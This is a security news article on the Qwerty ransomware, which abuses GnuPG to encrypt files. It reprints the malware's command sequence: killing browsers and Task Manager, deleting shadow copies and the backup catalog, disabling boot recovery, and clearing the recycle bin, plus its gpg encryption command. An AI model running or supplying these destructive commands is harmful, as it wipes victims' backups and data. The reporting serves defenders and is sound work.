Skip to content
July 18, 2026
  • Linkedin
  • Twitter
  • Facebook
  • Youtube

Daily CyberSecurity

Zero-hour alerts. Unmatched analysis.

Primary Menu
  • Home
  • CVE Data
    • CVE Watchtower
    • Top Exploited CVEs
    • CVE Stats by Vendor
    • Q2 2026 Report
  • Cyber Criminals
  • Data Leak
  • Linux
  • Malware
  • Vulnerability
  • Submit Press Release
  • Weekly Recap
Light/Dark Button
  • Home
  • News
  • Malware
  • Qwerty ransomware uses legitimate software GnuPG to encrypt victim files
  • Malware

Qwerty ransomware uses legitimate software GnuPG to encrypt victim files

Do Son March 12, 2018 2 minutes read
Qwerty ransomware
Add Daily CyberSecurity as a preferred source on Google

The new ransomware that has been discovered uses the legal software GnuPG to encrypt the victim’s files. Currently, this ransomware is called “Qwerty” and it will encrypt the victim file, overwrite the original file, and append the .qwerty extension to the file name of the encrypted file.

GnuPG, also known as GNU Privacy Guard or GPG. It is a non-commercial version of PGP (Pretty Good Privacy), which is used to encrypt and verify emails, files, and other data to ensure the reliability and authenticity of the communication data.

According to the researchers, Qwerty’s complete package consists of several files, including the executables GnuPG gpg.exe and gnuwin32 shred.exe, a batch file for loading keys and launching JS files, and that is used to launch the find.exe program.

 

The first file to start is the key.bat file. The file executes various commands in order as the main startup program for ransomware.

 

When the batch file is executed, the key will be imported as follows:

 

After importing the key, the batch file will start run.js. This file will execute find.exe (the main ransomware component). When find.exe is executed, it will specify the drive letter to be encrypted.

 

When find.exe is executed, it will start the following command on the victim’s computer.

taskkill /F /IM sql /T

taskkill /F /IM chrome.exe /T
taskkill /F /IM ie.exe /T
taskkill /F /IM firefox.exe /T
taskkill /F /IM opera.exe /T
taskkill /F /IM safari.exe /T
taskkill /F /IM taskmgr.exe /T
taskkill /F /IM 1c /T
vssadmin.exe delete shadows /all /quiet
wmic shadowcopy delete
bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe bcdedit /set {default} recoveryenabled no
wbadmin.exe wbadmin delete catalog -quiet
del /Q /F /S %s$recycle.bin

 

Then, it starts encrypting each drive on the computer by executing the following command while encrypting the file:

gpg.exe --recipient qwerty  -o "%s%s.%d.qwerty" --encrypt "%s%s"

 

 

This command encrypts the file using the imported key, then saves it as a new file with the same name and appends the .qwerty extension to it. For example, test.jpg will become test.jpg.qwerty after encryption.

 

When encrypting files, Qwerty will encrypt any file that does not contain the following strings:

Recycle

temp
Temp
TEMP
windows
Windows
WINDOWS
Program Files
PROGRAM FILES
ProgramData
gnupg
.qwerty
README_DECRYPT.txt
.exe
.dll

 

In addition, after encrypting the file, it runs shred.exe to overwrite the original file. After that, a ransom note named “README_DECRYPT.txt” will be created to show the contact information of the Qwerty developer.

 

Unfortunately, the current ransomware is secure and there is no way to decrypt the encrypted file for free. However, since Qwerty’s encryption component runs very slowly during the process of encrypting computer files, if the ransomware is found to be running in time, we can turn off the computer before more files are encrypted to reduce the loss.

Source, Image: bleepingcomputer

Related coverage

  • Poseidon Stealer Malware Targets Mac Users via Fake DeepSeek Site
  • ZeroLogon to NoPac Vulnerability: Black Basta Group’s Exploit Arsenal Revealed
  • WINELOADER: A Tool for Espionage and Disruption
  • HiatusRAT Campaign Targets Web Cameras and DVRs: FBI Warns of Rising IoT Exploits
  • Lazarus Group’s Infostealer Malware Targets Developers in New Espionage Campaigns
Track all actively exploited CVEs →

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee Logo Buy Me a Coffee PayPal
Crypto QR Code
USDT (TRC20):
TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm
USDT (ERC20):
0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce

Share this article:

Facebook Post LinkedIn Telegram
Written by
@DdoS · Security Researcher

Do Son

Do Son is the Founder and Editor of SecurityOnline.info. Working in cybersecurity since 2013, he reports on vulnerabilities, malware, and emerging threats, providing timely analysis to help organizations and individuals stay ahead of evolving risks.

Tags: Qwerty ransomware

Search

Translation

CVE WATCHTOWER
🚨

Receive alerts for vulnerabilities being exploited in the wild.

⚡

Get notified instantly when a Proof of Concept (PoC) exploit is published.

🔍

Access critical info on vulnerabilities even when marked as "RESERVED".

🧠

Insights powered by decades of expertise and global intelligence sources.

🎯

Customize alerts with up to 10 keywords for your specific tech stack.

📊

Export the raw CVE database for SIEM integration and reporting.

Upgrade Package

🚨 Active Exploits in the Wild

  • CVE-2026-6875CVSS 9.5
    ServiceNow has addressed a remote code execution vulnerability that was identified in the ServiceNow AI platform. This vulnerability...
    Admin intel📅 Updated: Jul 18, 2026
  • CVE-2026-39808CVSS 9.8
    A improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSandbox...
    CISA KEV📅 Added to KEV: Jul 16, 2026
  • CVE-2026-25089CVSS 9.8
    A improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSandbox...
    CISA KEV📅 Added to KEV: Jul 16, 2026
  • CVE-2026-58644CVSS 9.8
    Deserialization of untrusted data in Microsoft Office SharePoint allows an unauthorized attacker to execute code over a network.
    CISA KEV📅 Added to KEV: Jul 16, 2026
  • CVE-2023-4346CVSS 7.5
    KNX devices that use KNX Connection Authorization and support Option 1 are, depending on the implementation, vulnerable to...
    CISA KEV📅 Added to KEV: Jul 15, 2026
  • CVE-2026-53362
    In the Linux kernel, the following vulnerability has been resolved: ipv6: account for fraggap on the paged allocation...
    Admin intel📅 Updated: Jul 14, 2026
  • CVE-2026-46242CVSS 7.8
    In the Linux kernel, the following vulnerability has been resolved: eventpoll: fix ep_remove struct eventpoll / struct file...
    Admin intel📅 Updated: Jul 14, 2026
  • CVE-2026-56155CVSS 7.8
    Insufficient granularity of access control in Active Directory Federation Services (AD FS) allows an authorized attacker to elevate...
    CISA KEV📅 Added to KEV: Jul 14, 2026
Powered by CVE Watchtower

🔴 Live Critical Threats

  • CVE-2026-16117CVSS 10.0
    Impact: @fastify/http-proxy versions up to and including 11.5.0 fail to rewrite the...
  • CVE-2026-47865CVSS 9.8
    VMware Avi Load Balancer contains an authentication bypass vulnerability. A malicious user...
  • CVE-2026-55518CVSS 9.6
    Avo is a framework to create admin panels for Ruby on Rails...
  • CVE-2026-54159CVSS 10.0
    PrestaShop ps_facetedsearch is a module that adds layered navigation filters. From 3.0.0...
  • CVE-2026-48062CVSS 9.8
    CodeIgniter is a PHP full-stack web framework. Prior to 4.7.3, the ext_in...
  • CVE-2026-13446CVSS 9.8
    IBM Langflow OSS 1.0.0 through 1.10.1 contains hard-coded credentials, such as a password...
  • CVE-2026-8859CVSS 9.9
    IBM Langflow OSS 1.0.0 through 1.10.0 Langflow could allow an attacker to...
  • CVE-2026-8635CVSS 9.9
    IBM Langflow OSS 1.0.0 through 1.10.0 allows authenticated users to escalate privileges...
  • CVE-2026-8505CVSS 9.8
    IBM Langflow OSS 1.0.0 through 1.10.0 has a vulnerability in Langflow's webhook...
  • CVE-2026-8476CVSS 9.9
    IBM Langflow OSS 1.0.0 through 1.10.0 contain a critical remote code execution...
Powered by CVE WATCHTOWER

Our Websites
  • Penetration Testing Tools
  • The Daily Information Technology
  • Top Exploited CVEs
  • Daily CyberSecurity

    • About SecurityOnline.info
    • Advertise with us
    • Announcement
    • Contact
    • Contributor Register
    • Login
    • Disclaimer
    • DCMA
    • Privacy Policy
    • About SecurityOnline.info
    • Advertise on SecurityOnline.info
    • Contact Us

    When you purchase through links on our site, we may earn an affiliate commission. Here’s how it works

    • CVE Watchtower
    • CVE Statistics by Vendor 2026
    • Q2 2026 Report
    • Top Exploited CVEs
    • Linkedin
    • Twitter
    • Facebook
    • Youtube
    © 2017 - 2026 Daily CyberSecurity. All Rights Reserved.